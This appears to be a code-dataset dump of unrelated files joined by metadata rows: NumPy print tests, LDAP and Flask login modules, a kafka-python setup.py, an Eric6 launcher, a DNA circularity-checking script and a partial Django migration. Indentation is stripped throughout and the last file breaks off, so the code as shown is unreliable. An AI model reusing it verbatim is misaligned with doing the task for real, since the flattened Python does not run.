'[ 1.-infj]', '[ 1.-infj]', '[ 1.0-infj]',
'[ 1.+nanj]', '[ 1.+nanj]', '[ 1.0+nanj]',
'[-1.+0.j]', '[-1.+0.j]', '[-1.0+0.0j]',
'[-1.+1.j]', '[-1.+1.j]', '[-1.0+1.0j]',
'[-1.-1.j]', '[-1.-1.j]', '[-1.0-1.0j]',
'[-1.+infj]', '[-1.+infj]', '[-1.0+infj]',
'[-1.-infj]', '[-1.-infj]', '[-1.0-infj]',
'[-1.+nanj]', '[-1.+nanj]', '[-1.0+nanj]',
'[ inf+0.j]', '[ inf+0.j]', '[ inf+0.0j]',
'[ inf+1.j]', '[ inf+1.j]', '[ inf+1.0j]',
'[ inf-1.j]', '[ inf-1.j]', '[ inf-1.0j]',
'[ inf+infj]', '[ inf+infj]', '[ inf+infj]',
'[ inf-infj]', '[ inf-infj]', '[ inf-infj]',
'[ inf+nanj]', '[ inf+nanj]', '[ inf+nanj]',
'[-inf+0.j]', '[-inf+0.j]', '[-inf+0.0j]',
'[-inf+1.j]', '[-inf+1.j]', '[-inf+1.0j]',
'[-inf-1.j]', '[-inf-1.j]', '[-inf-1.0j]',
'[-inf+infj]', '[-inf+infj]', '[-inf+infj]',
'[-inf-infj]', '[-inf-infj]', '[-inf-infj]',
'[-inf+nanj]', '[-inf+nanj]', '[-inf+nanj]',
'[ nan+0.j]', '[ nan+0.j]', '[ nan+0.0j]',
'[ nan+1.j]', '[ nan+1.j]', '[ nan+1.0j]',
'[ nan-1.j]', '[ nan-1.j]', '[ nan-1.0j]',
'[ nan+infj]', '[ nan+infj]', '[ nan+infj]',
'[ nan-infj]', '[ nan-infj]', '[ nan-infj]',
'[ nan+nanj]', '[ nan+nanj]', '[ nan+nanj]']
for res, val in zip(actual, wanted):
assert_(res == val)
class TestArray2String(TestCase):
def test_basic(self):
"""Basic test of array2string."""
a = np.arange(3)
assert_(np.array2string(a) == '[0 1 2]')
assert_(np.array2string(a, max_line_width=4) == '[0 1\n 2]')
def test_style_keyword(self):
"""This should only apply to 0-D arrays. See #1218."""
stylestr = np.array2string(np.array(1.5),
style=lambda x: "Value in 0-D array: " + str(x))
assert_(stylestr == 'Value in 0-D array: 1.5')
def test_format_function(self):
"""Test custom format function for each element in array."""
def _format_function(x):
if np.abs(x) < 1:
return '.'
elif np.abs(x) < 2:
return 'o'
else:
return 'O'
x = np.arange(3)
if sys.version_info[0] >= 3:
x_hex = "[0x0 0x1 0x2]"
x_oct = "[0o0 0o1 0o2]"
else:
x_hex = "[0x0L 0x1L 0x2L]"
x_oct = "[0L 01L 02L]"
assert_(np.array2string(x, formatter={'all':_format_function}) ==
"[. o O]")
assert_(np.array2string(x, formatter={'int_kind':_format_function}) ==
"[. o O]")
assert_(np.array2string(x, formatter={'all':lambda x: "%.4f" % x}) ==
"[0.0000 1.0000 2.0000]")
assert_equal(np.array2string(x, formatter={'int':lambda x: hex(x)}),
x_hex)
assert_equal(np.array2string(x, formatter={'int':lambda x: oct(x)}),
x_oct)
x = np.arange(3.)
assert_(np.array2string(x, formatter={'float_kind':lambda x: "%.2f" % x}) ==
"[0.00 1.00 2.00]")
assert_(np.array2string(x, formatter={'float':lambda x: "%.2f" % x}) ==
"[0.00 1.00 2.00]")
s = np.array(['abc', 'def'])
assert_(np.array2string(s, formatter={'numpystr':lambda s: s*2}) ==
'[abcabc defdef]')
class TestPrintOptions:
"""Test getting and setting global print options."""
def setUp(self):
self.oldopts = np.get_printoptions()
def tearDown(self):
np.set_printoptions(**self.oldopts)
def test_basic(self):
x = np.array([1.5, 0, 1.234567890])
assert_equal(repr(x), "array([ 1.5 , 0. , 1.23456789])")
np.set_printoptions(precision=4)
assert_equal(repr(x), "array([ 1.5 , 0. , 1.2346])")
def test_precision_zero(self):
np.set_printoptions(precision=0)
for values, string in (
([0.], " 0."), ([.3], " 0."), ([-.3], "-0."), ([.7], " 1."),
([1.5], " 2."), ([-1.5], "-2."), ([-15.34], "-15."),
([100.], " 100."), ([.2, -1, 122.51], " 0., -1., 123."),
([0], "0"), ([-12], "-12"), ([complex(.3, -.7)], " 0.-1.j")):
x = np.array(values)
assert_equal(repr(x), "array([%s])" % string)
def test_formatter(self):
x = np.arange(3)
np.set_printoptions(formatter={'all':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1, 0, 1])")
def test_formatter_reset(self):
x = np.arange(3)
np.set_printoptions(formatter={'all':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1, 0, 1])")
np.set_printoptions(formatter={'int':None})
assert_equal(repr(x), "array([0, 1, 2])")
np.set_printoptions(formatter={'all':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1, 0, 1])")
np.set_printoptions(formatter={'all':None})
assert_equal(repr(x), "array([0, 1, 2])")
np.set_printoptions(formatter={'int':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1, 0, 1])")
np.set_printoptions(formatter={'int_kind':None})
assert_equal(repr(x), "array([0, 1, 2])")
x = np.arange(3.)
np.set_printoptions(formatter={'float':lambda x: str(x-1)})
assert_equal(repr(x), "array([-1.0, 0.0, 1.0])")
np.set_printoptions(formatter={'float_kind':None})
assert_equal(repr(x), "array([ 0., 1., 2.])")
def test_unicode_object_array():
import sys
if sys.version_info[0] >= 3:
expected = "array(['é'], dtype=object)"
else:
expected = "array([u'\\xe9'], dtype=object)"
x = np.array([sixu('\xe9')], dtype=object)
assert_equal(repr(x), expected)
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | -4,426,322,103,313,854,500 | 39.922652 | 84 | 0.44647 | false |
Reigel/kansha | kansha/authentication/ldap/ldap_auth.py | 1 | 4186 | # -*- coding:utf-8 -*-
# --
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
# --
from nagare import log
try:
import ldap
except ImportError:
ldap = None
import sys
import types
def toUTF8(v):
if isinstance(v, unicode):
return v.encode('utf-8')
elif isinstance(v, (types.TupleType, types.ListType)):
return [toUTF8(e) for e in v]
elif isinstance(v, types.DictType):
return dict([(toUTF8(k), toUTF8(v_)) for k, v_ in v.items()])
else:
return v
class LDAPAuth(object):
def __init__(self, ldap_cfg):
ldap_cfg = toUTF8(ldap_cfg)
self.server = "ldap://%s:%s" % (ldap_cfg['host'], ldap_cfg['port'])
self.users_base_dn = ldap_cfg['users_base_dn']
def connect(self):
"""Connect to LDAP server
Return:
- a server connection
"""
assert ldap, 'python_ldap not installed'
return ldap.initialize(self.server)
def get_user_dn(self, uid):
raise NotImplementedError()
def check_password(self, uid, password):
"""Check if the specified couple user/password is correct
In:
- ``uid`` -- the user id
- ``password`` -- the user password
Return:
- True if password is checked
"""
c = self.connect()
dn = self.get_user_dn(uid)
# Try to authenticate
try:
c.simple_bind_s(dn, password.encode('UTF-8'))
return True
except ldap.INVALID_CREDENTIALS:
log.info("Bad credentials for DN %r" % dn)
except ldap.SERVER_DOWN:
log.critical("LDAP server down")
finally:
c.unbind()
def get_profile(self, uid, password):
raise NotImplementedError()
class NngLDAPAuth(LDAPAuth):
def get_user_dn(self, uid):
"""Construct a user DN given an user id
In:
- ``uid`` -- the user id
Return:
- a string, the user DN
"""
return 'uid=%s,%s' % (ldap.dn.escape_dn_chars(toUTF8(uid)), self.users_base_dn)
def get_profile(self, uid, password):
c = self.connect()
ldap_result = c.search_s(self.get_user_dn(uid), ldap.SCOPE_BASE)[0][1]
profile = {}
profile['uid'] = ldap_result['uid'][0]
profile['name'] = ldap_result['displayName'][0].decode('utf-8')
profile['email'] = ldap_result['mail'][0]
profile['picture'] = ldap_result['jpegPhoto'][0] if 'jpegPhoto' in ldap_result else None
return profile
class ADLDAPAuth(LDAPAuth):
def connect(self):
conn = super(ADLDAPAuth, self).connect()
conn.set_option(ldap.OPT_REFERRALS, 0)
conn.protocol_version = 3
return conn
def check_password(self, uid, password):
"""Check if the specified couple user/password is correct
In:
- ``uid`` -- the user id
- ``password`` -- the user password
Return:
- True if password is checked
"""
c = self.connect()
# Try to authenticate
try:
c.simple_bind_s(uid, password)
return True
except ldap.INVALID_CREDENTIALS:
log.info("Bad credentials for uid %r" % uid)
except ldap.SERVER_DOWN:
log.critical("LDAP server down")
finally:
c.unbind()
def get_profile(self, uid, password):
c = self.connect()
c.simple_bind_s(uid, password)
ldap_result = c.search_s(self.users_base_dn, ldap.SCOPE_SUBTREE,
'(userPrincipalName=%s)' % ldap.dn.escape_dn_chars(toUTF8(uid)))[0][1]
profile = {}
profile['uid'] = ldap_result['sAMAccountName'][0]
profile['name'] = ldap_result['displayName'][0].decode('utf-8')
profile['email'] = ldap_result.get('mail', [''])[0]
profile['picture'] = ldap_result['thumbnailPhoto'][0] if 'thumbnailPhoto' in ldap_result else None
c.unbind()
return profile
| bsd-3-clause | 3,308,616,112,407,735,300 | 29.779412 | 106 | 0.567845 | false |
CrowdStrike/kafka-python | setup.py | 1 | 1752 | import sys
from setuptools import setup, Command
with open('VERSION', 'r') as v:
__version__ = v.read().rstrip()
class Tox(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
@classmethod
def run(cls):
import tox
sys.exit(tox.cmdline([]))
test_require = ['tox', 'mock']
if sys.version_info < (2, 7):
test_require.append('unittest2')
setup(
name="kafka-python",
version=__version__,
tests_require=test_require,
cmdclass={"test": Tox},
packages=[
"kafka",
"kafka.consumer",
"kafka.partitioner",
"kafka.producer",
],
author="David Arthur",
author_email="[email protected]",
url="https://github.com/mumrah/kafka-python",
license="Apache License 2.0",
description="Pure Python client for Apache Kafka",
long_description="""
This module provides low-level protocol support for Apache Kafka as well as
high-level consumer and producer classes. Request batching is supported by the
protocol as well as broker-aware request routing. Gzip and Snappy compression
is also supported for message sets.
""",
keywords="apache kafka",
install_requires=['six'],
classifiers = [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
]
)
| apache-2.0 | 5,926,308,993,090,215,000 | 24.764706 | 78 | 0.627283 | false |
davy39/eric | eric6_trpreviewer.py | 1 | 2399 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2004 - 2014 Detlev Offenbach <[email protected]>
#
"""
Eric6 TR Previewer.
This is the main Python script that performs the necessary initialization
of the tr previewer and starts the Qt event loop. This is a standalone version
of the integrated tr previewer.
"""
from __future__ import unicode_literals
import Toolbox.PyQt4ImportHook # __IGNORE_WARNING__
try: # Only for Py2
import Utilities.compatibility_fixes # __IGNORE_WARNING__
except (ImportError):
pass
import sys
for arg in sys.argv:
if arg.startswith("--config="):
import Globals
configDir = arg.replace("--config=", "")
Globals.setConfigDir(configDir)
sys.argv.remove(arg)
break
from E5Gui.E5Application import E5Application
from Tools.TRSingleApplication import TRSingleApplicationClient
from Globals import AppInfo
from Toolbox import Startup
def createMainWidget(argv):
"""
Function to create the main widget.
@param argv list of commandline parameters (list of strings)
@return reference to the main widget (QWidget)
"""
from Tools.TRPreviewer import TRPreviewer
if len(argv) > 1:
files = argv[1:]
else:
files = []
previewer = TRPreviewer(files, None, 'TRPreviewer')
return previewer
def main():
"""
Main entry point into the application.
"""
options = [
("--config=configDir",
"use the given directory as the one containing the config files"),
]
appinfo = AppInfo.makeAppInfo(sys.argv,
"Eric6 TR Previewer",
"file",
"TR file previewer",
options)
app = E5Application(sys.argv)
client = TRSingleApplicationClient()
res = client.connect()
if res > 0:
if len(sys.argv) > 1:
client.processArgs(sys.argv[1:])
sys.exit(0)
elif res < 0:
print("eric6_trpreviewer: {0}".format(client.errstr()))
sys.exit(res)
else:
res = Startup.simpleAppStartup(sys.argv,
appinfo,
createMainWidget,
app=app)
sys.exit(res)
if __name__ == '__main__':
main()
| gpl-3.0 | -8,780,271,109,807,929,000 | 25.076087 | 78 | 0.581909 | false |
chrishah/MITObim | misc_scripts/circules.py | 2 | 14307 | #!/usr/bin/python
import sys,warnings
import argparse
VERSION="0.5"
DESCRIPTION='''
circules - checks for circularity in nucleotide sequences
version: v.%s
# Disclaimer: #
The script is currently in the beta phase. Any feedback is much appreciated.
''' %VERSION
kmers = []
dic = {}
seqs = {}
motifs_by_regions = {}
#auto=True
def write_clipped(seq_header, seq_seq, start, end, prefix):
start = int(start)
end = int(end)
l = str(end - start)
#writing out clipped sequence
print "clip points: %i - %i - length: %s -> writing sequence to '%s.circular.%s.fasta'\n" %(start, end, l, prefix, l)
sequence = seq_seq[start:end]
out = open(prefix+'.circular.'+l+'.fasta','w')
out.write(">%s_ciruclar_%s\n%s\n" %(seq_header, str(l), sequence))
out.close()
#writing out file for testing circularity
out = open(prefix+'.'+l+'.for-testing.fasta','w')
clip_from = start
clip_to = end
sequence = seq_seq[clip_to-500:clip_to]+seq_seq[clip_from:clip_from+500]
out.write(">test_%s\n%s\n" %(str(l),sequence))
out.close()
def roll_over(seq_seq, new_start, prefix):
print "new start coordinate: %s -> writing sequence to '%s.roll.%s.fasta'\n" %(new_start, prefix, new_start)
sequence = seq_seq[new_start-1:]+seq_seq[:new_start-1]
out = open(prefix+'.rolled.'+str(new_start)+'.fasta', 'w')
out.write(">%s_s%s_l%s\n%s\n" %(prefix, new_start, len(sequence), sequence))
out.close()
parser = argparse.ArgumentParser(description=DESCRIPTION, prog='circules.py',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=''' examples:
# check for circularity using a k-mer length of 31 - returns suggestion(s) for clipping points in putative circular sequences.
circules.py -f test.fasta -k 31
# check for circularity using k-mer lengths 31-51, stepsize 2bp - returns suggestion(s) for clipping points in putative circular sequences.
circules.py -f test.fasta -k 31-51 -s 2
# check for circularity using a k-mer length of 31. If length of suggested circular sequence is within +/- 1 percent of the expected length (15000 bp)
# the clipped sequence will be written to a file called 'mytest.circular.fasta'. In addition a file 'mytest.for-testing.fasta' will be written. It contains
# a 1000 bp sequence obtained by joining the first/last 500 bp of the proposed clipped circular sequence for additional evaluation if required.
circules.py -f test.fasta -k 31 -l 15000 -p mytest
# check for circularity using a k-mer length of 41. Extract if candidate is found in length range 9000 - 11000.
circules.py -f test.fasta -k 41 -k 10000 --length_tolerance_percent 10
# clip sequence at specific clip points
circules.py -f test.fasta -c 32,15430
# roll circular sequence to new startposition, e.g. 46
circules.py -f test.fasta -n 46
''')
parser.add_argument("-f", "--fasta", help="fasta file containing the sequence to be evaluate.", metavar="<FILE>", action="store")
parser.add_argument("-k", "--kmer", help="kmer size. single number (default = 31) or range (e.g. 31-35).", type=str, default='31', action="store")
parser.add_argument("-s", "--kmer_step", help="kmer step size (default = 2).", type=int, default='2', action="store")
parser.add_argument("-p", "--prefix", help="prefix for output files (default = 'circular').", type=str, metavar="<STR>", action="store", default='circular')
parser.add_argument("-c", "--extract_by_coordinates", help="Coordinates for clipping of sequence in format 'startpos,endpos'. Clipped sequence will be written to file 'prefix.circular.fasta'.", type=str, metavar="<INT,INT>", action="store")
parser.add_argument("-l", "--extract_by_length", help="expected length (in bp) of circular molecule. If a candidate of length expected (+-length tolerance if specified) is found, sequence will be clipped and written to file 'prefix.circular.fasta'.", type=int, metavar="<INT>", default='0', action="store")
parser.add_argument("--length_tolerance_percent", help="percent length tolerance (e.g. 0.1, for 10 %%). Candidate fragments must have a length of 'expected length +/- t * expected length'. Default = 0.", type=float, metavar="<FLOAT>", default='0', action="store")
parser.add_argument("--length_tolerance_absolute", help="absolute length tolerance (e.g. 1000). Candidate fragments must have a length of 'expected length +/- tolerance'. Default = 0.", type=int, metavar="<INT>", default='0', action="store")
parser.add_argument("-n", "--newstart_roll", help="'roll' a putative ciruclar sequence to a specified new start point. Sequence will be written to file 'prefix.roll.{n}.fasta'.", type=int, metavar="<INT>", default='0', action="store")
#parser.add_argument("-r", "--readpool", help="path to fastq reads to be used for evaluating circularity.", type=str, metavar="<FILE>", action="store")
#parser.add_argument("-v", "--verbose", help="turn verbose output on.", action="store_true")
parser.add_argument("--version", action="version", version=VERSION)
args = parser.parse_args()
if len(sys.argv) < 2: #if the script is called without any arguments display the usage
print
print "%s\n" %DESCRIPTION
parser.print_usage()
print
sys.exit(1)
if '-' in args.kmer:
kmers = args.kmer.strip().split("-")
kmers.append(args.kmer_step)
for i in range(len(kmers)):
kmers[i] = int(kmers[i])
else:
kmers = [int(args.kmer),int(args.kmer)+1, 1]
fa = open(args.fasta,'r')
for l in fa:
if l.startswith('>'):
current = l.strip().replace('>','')
seqs[current] = ''
else:
seqs[current]+=l.strip().upper()
if len(seqs) > 1:
print "\nThe file '%s' contains %i sequences. The circules script is currently designed to only handle a single fasta sequence at a time - Sorry!\n" %(args.fasta, len(seqs))
sys.exit()
print "%s\n" %DESCRIPTION
print "\n###########################\n\nProcessing sequence of length %s" %len(seqs[seqs.keys()[0]])
if args.newstart_roll:
print "\n####################\n## Result output ##\n####################\n"
print "\n'Rolling' circular sequence to new start coordinate .."
roll_over(seqs[seqs.keys()[0]], args.newstart_roll, args.prefix)
print ""
sys.exit()
if args.extract_by_coordinates:
if not ',' in args.extract_by_coordinates:
print "Expecting clipping coordinates delimited by comma (','), e.g. '-c 50,1567'"
sys.exit()
print "\n####################\n## Result output ##\n####################\n"
print "\nExtracting sequence by coordinates .."
clips = args.extract_by_coordinates.split(",")
write_clipped(seqs.keys()[0], seqs[seqs.keys()[0]], clips[0], clips[1], args.prefix)
print ""
sys.exit()
for k in range(kmers[0],kmers[1],kmers[2]):
clips = {}
repeats = {}
for s in seqs:
print "\nCollecting %s-mers .." %k,
i=0
while i <= (len(seqs[s])-k):
kmer = str(seqs[s][i:i+k])
# print i,kmer,
if not kmer[-1] in 'acgtACGT':
# print "\tlast base of current kmer is ambiguous - jumping ahead by %s bases" %k
# i+=k
skip = k
ok = False
while ok == False:
i+=skip
kmer = str(seqs[s][i:i+k])
skip = 0
# print "%i %s" %(i, kmer)
for pos in reversed(range(len(kmer))):
# print pos,kmer[pos]
if not kmer[pos] in 'acgtACGT':
# print "%i\tambiguous" %pos
skip = pos+1
break
if skip == 0:
ok = True
continue
if not kmer in dic:
dic[kmer] = []
dic[kmer].append(i)
# print "\tok"
i+=1
print "Done!"
print "Evaluating %s-mers .." %k,
for s in seqs:
test = {}
i=0
while i <= (len(seqs[s])-k):
kmer = str(seqs[s][i:i+k])
if not kmer in dic:
evaluate = False
else:
evaluate = True
if evaluate:
count = len(dic[kmer]) #this is the number of times the current kmer was found
if count == 2:
length = dic[kmer][1]-dic[kmer][0]
if not length in clips:
clips[length] = []
clips[length].append(dic[kmer])
elif count > 2:
if not kmer in repeats:
repeats[kmer] = []
repeats[kmer].extend(dic[kmer])
i+=1
print "Done!\n"
if repeats:
print "\n###################\n## Repeat report ##\n###################"
tandem = {}
for kmer in repeats:
repeats[kmer] = sorted(list(set(repeats[kmer])))
# print "\n%s %s" %(kmer,repeats[kmer])
#find blocks
block = False
blocks = [[],[]]
dists = {}
for i in range(len(repeats[kmer])-1):
neighbour_dist = repeats[kmer][i+1] - repeats[kmer][i]
if not neighbour_dist in dists:
dists[neighbour_dist] = 0
dists[neighbour_dist]+=1
# print "%s vs %s" %(repeats[kmer][i],repeats[kmer][i+1])
if neighbour_dist <= k:
if not block:
blocks[0].append(repeats[kmer][i])
blocks[1].append(repeats[kmer][i+1]+k)
block = True
else:
blocks[1][-1] = repeats[kmer][i+1]+k
else:
if not block:
blocks[0].append(repeats[kmer][i])
blocks[1].append(repeats[kmer][i]+k)
block = False
if not block:
blocks[0].append(repeats[kmer][-1])
blocks[1].append(repeats[kmer][-1]+k)
tandem[int(blocks[0][0])] = blocks
tandem[int(blocks[0][0])].append(dists)
if tandem:
motifs = []
start_positions = sorted(tandem)
active = False
for i in range(len(start_positions)-1):
if (start_positions[i+1] - start_positions[i]) == 1:
if not active:
motifs.append([start_positions[i],start_positions[i+1]])
active = True
else:
motifs[-1][-1] = start_positions[i+1]
else:
if not active:
motifs.append([start_positions[i],start_positions[i]])
active=False
if not active:
motifs.append([start_positions[-1],start_positions[-1]])
for m in motifs:
block_start_end_coordinates = {}
minstep = int(sorted(tandem[m[0]][2])[0])
coordinates = range(m[0],m[1]+1)
if minstep >= k:
m[1]+=k-1
elif minstep > (m[1]+1-m[0]):
m[1]=m[0]+minstep-1
for c in coordinates: #this loop finds the start and end position of each block
for i in range(len(tandem[c][0])):
if not i in block_start_end_coordinates:
block_start_end_coordinates[i] = [tandem[c][0][i],tandem[c][1][i]]
if tandem[c][0][i] < block_start_end_coordinates[i][0]:
block_start_end_coordinates[i][0] = tandem[c][0][i]
if tandem[c][1][i] > block_start_end_coordinates[i][1]:
block_start_end_coordinates[i][1] = tandem[c][1][i]
motif = seqs[s][m[0]:m[1]+1]
if not motif in motifs_by_regions:
motifs_by_regions[motif] = []
print "\nmotif '%s', found multiple times in the following region(s) (start - end coordinate):" %seqs[s][m[0]:m[1]+1]
for b in sorted(block_start_end_coordinates):
# print b,block_start_end_coordinates[b]
start = block_start_end_coordinates[b][0]
end = block_start_end_coordinates[b][1]
print "%i - %i (%i x)" %(start, end, (end-start)/(m[1]-m[0]+1))
# print seqs[s][start:end+1]
# print len(seqs[s])
motifs_by_regions[motif].append([start,end])
print "\n########################\n## Circularity report ##\n########################"
nothing = True
if len(clips) >= 1:
print "\nFound %i candidate(s) for circularity supported by duplicated %i-mers:" %(len(clips), k)
for l in sorted(clips):
print "\t- suggested clip points %i - %i (length %s; supported by %i duplicted %i-mers); extract by adding '-l %i' or '-c %s,%s' to your command" %(int(clips[l][0][0]), int(clips[l][0][1]), l, len(clips[l])/2, k, l, clips[l][0][0], clips[l][0][1])
nothing = False
if motifs_by_regions:
for m in motifs_by_regions:
primes = [0]
for i in range(len(motifs_by_regions[m])):
if motifs_by_regions[m][i][0] == 0:
primes[0] = i
if motifs_by_regions[m][i][1] == len(seqs[s]):
primes.append(i)
if len(primes) == 2:
print "\nFound motif '%s' at terminal positions (see 'Repeat report' above), which could indicate circularity." %m
start_clip = motifs_by_regions[m][primes[0]][1]
end_clip = motifs_by_regions[m][primes[1]][1]
print "\t- suggested clip points: %s - %s (length %s); extract the clipped sequence by adding '-c %s,%s' to your command" %(start_clip, end_clip, end_clip-start_clip, start_clip, end_clip)
print "\n\tThis will remove the repeated motif from the 5' end of the sequence.\n\tThe correct length can currently not be determined unambiguously because of the repeat. Longer reads could resolve this.\n"
sys.exit()
if nothing:
print "\nDid not find any candidates for circularity using k = %s\n" %k
sys.exit()
print ""
if args.extract_by_length:
print "\n####################\n## Result output ##\n####################\n"
print "Extracting by expected length .."
if args.length_tolerance_absolute:
minlength = args.extract_by_length - args.length_tolerance_absolute
maxlength = args.extract_by_length + args.length_tolerance_absolute
elif args.length_tolerance_percent:
minlength = float(args.extract_by_length)*(1-args.length_tolerance_percent)
maxlength = float(args.extract_by_length)*(1+args.length_tolerance_percent)
else:
minlength = args.extract_by_length
maxlength = minlength
print "specified length: %s (tolerance: %s - %s) - Evaluating candidate lengths" %(args.extract_by_length, minlength, maxlength)
for l in sorted(clips):
if l <= maxlength and l >= minlength:
pass
else:
del(clips[l])
if clips:
print "\nFound candidates in the expected length range"
for s in seqs:
for l in sorted(clips):
write_clipped(s, seqs[s], clips[l][0][0], clips[l][0][1], args.prefix)
#writing out clipped sequence
# print "length: %s - clip points: %i - %i -> writing sequence to '%s.circular.%s.fasta'\n" %(str(l), int(clips[l][0][0]), int(clips[l][0][1]), args.prefix, str(l))
# sequence = seqs[s][int(clips[l][0][0]):int(clips[l][0][1])]
# out = open(args.prefix+'.circular.'+str(l)+'.fasta','w')
# out.write(">%s_ciruclar_%s\n%s\n" %(s, str(l), sequence))
# out.close()
# #writing out file for testing circularity
# out = open(args.prefix+'.'+str(l)+'.for-testing.fasta','w')
# clip_from = int(clips[l][0][0])
# clip_to = int(clips[l][0][1])
# sequence = seqs[s][clip_to-500:clip_to]+seqs[s][clip_from:clip_from+500]
# out.write(">test_%s\n%s\n" %(str(l),sequence))
# out.close()
else:
print "\nDid not find any candidates in the specified length range\n"
| mit | 5,351,275,712,881,326,000 | 36.064767 | 307 | 0.638499 | false |
h-friederich/lpm | login.py | 1 | 3179 | from functools import wraps
from flask import Blueprint, request, redirect, render_template, url_for, g, flash
from flask.ext.login import LoginManager, login_user, logout_user, current_user
from flask_wtf import Form
from wtforms import StringField, PasswordField
import base64
from . import auth
login_manager = LoginManager()
login_manager.login_view = 'login.login'
bp = Blueprint('login', __name__)
def init(app):
login_manager.init_app(app)
auth.init(app)
class LoginForm(Form):
# Note: no input validation, submitted value will be handed in the auth module itself
# otherwise we'd have to fetch the full user list for every login
username = StringField('User')
password = PasswordField('Password')
@bp.route('/login', methods=["GET", "POST"])
def login():
"""
Presents the login page
If login data is POSTed, the credentials are validated and the user logged in if successful
"""
form = LoginForm()
if request.method == 'POST' and form.is_submitted():
usr = auth.auth_user(form.username.data, form.password.data)
if usr and usr.has_role('login') and usr.is_active:
login_user(usr)
return redirect(request.args.get('next') or url_for('items.overview'))
elif usr is None:
flash('invalid credentials', 'error')
elif not usr.is_active:
flash('login expired', 'error')
else:
flash('insufficient permissions', 'error')
return render_template('login.html', form=form)
@bp.route('/logout')
def logout():
"""
Performs a logout on the user
"""
logout_user()
return redirect(url_for('login.login'))
def role_required(roles):
"""
Decorator that ensures the current user has
- one of the specified roles (if a tuple)
- the specified role (otherwise)
"""
def real_role_required(f):
@wraps(f)
def wrapper(*args, **kwargs):
introles = roles
if not isinstance(introles, tuple):
introles = (introles,)
valid = False
if current_user.is_authenticated:
for role in introles:
if current_user.has_role(role):
valid = True
break
if not valid:
flash('insufficient privileges to access this page', 'danger')
return login_manager.unauthorized()
return f(*args, **kwargs)
return wrapper
return real_role_required
@login_manager.user_loader
def load_user(username):
"""
Default user loader for the login plugin
"""
return auth.get_user(username)
@login_manager.request_loader
def load_from_request(request):
"""
User loader from basic authorization header
(i.e. for external API)
"""
try:
authinfo = request.headers.get('Authorization', '').replace('Basic ', '', 1)
username, password = base64.b64decode(authinfo).decode('utf-8').split(':')
except:
return None
usr = auth.auth_user(username, password)
if usr and usr.has_role('request_login'):
return usr
return None | bsd-3-clause | 5,078,731,911,012,853,000 | 29 | 95 | 0.621579 | false |
diegonalvarez/tournament-stats | equipos/migrations/0001_initial.py | 1 | 5904 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Equipo'
db.create_table(u'equipos_equipo', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('nombre', self.gf('django.db.models.fields.CharField')(max_length=120)),
('timestamp', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('updated', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('complejo_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['complejos.Complejo'])),
))
db.send_create_signal(u'equipos', ['Equipo'])
def backwards(self, orm):
# Deleting model 'Equipo'
db.delete_table(u'equipos_equipo')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'complejos.complejo': {
'Meta': {'object_name': 'Complejo'},
'direccion': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitud': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True', 'blank': 'True'}),
'longitud': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True', 'blank': 'True'}),
